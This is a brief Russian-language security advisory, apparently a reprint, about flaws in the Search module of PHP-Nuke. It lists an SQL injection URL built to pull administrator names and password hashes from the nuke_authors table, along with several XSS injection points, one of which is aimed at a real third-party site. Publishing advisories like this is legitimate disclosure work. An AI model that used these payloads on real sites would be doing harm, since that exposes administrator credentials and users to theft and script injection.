Xakep #305. Многошаговые SQL-инъекции
Программа: PHP-Nuke
Несколько уязвимостей обнаружено в PHP-Nuke в 'Search' модуле. Удаленный пользователь может внедрить SQL команды. Удаленный пользователь может выполнить XSS нападение. Удаленный пользователь может также определить инсталляционный путь.
1. SQL инъекция:
http://localhost/nuke73/modules.php?name= Search&type=stories&query=f00bar&category=-1
&categ=%2 0and%201=2%20UNION%20SELECT% 200,0,aid,pwd,0,0,0,0,0,0%20from%
20nuke_authors/*
2. XSS:
http://localhost/nuke73/modules.php?name= Search&sid=[xss code here]
http://localhost/nuke73/modules.php?name= Search&query=*&max=[xss code here]
http://localhost/nuke73/modules.php?name= Search&query=waraxe&sel1=[xss code here]&type=comments
http://localhost/nuke73/modules.php?name= Search&a=6&query=*&match=[xss code here]
http://www.nukecops.com/modules.php?name =Search&query=*&m od3=[xss code here]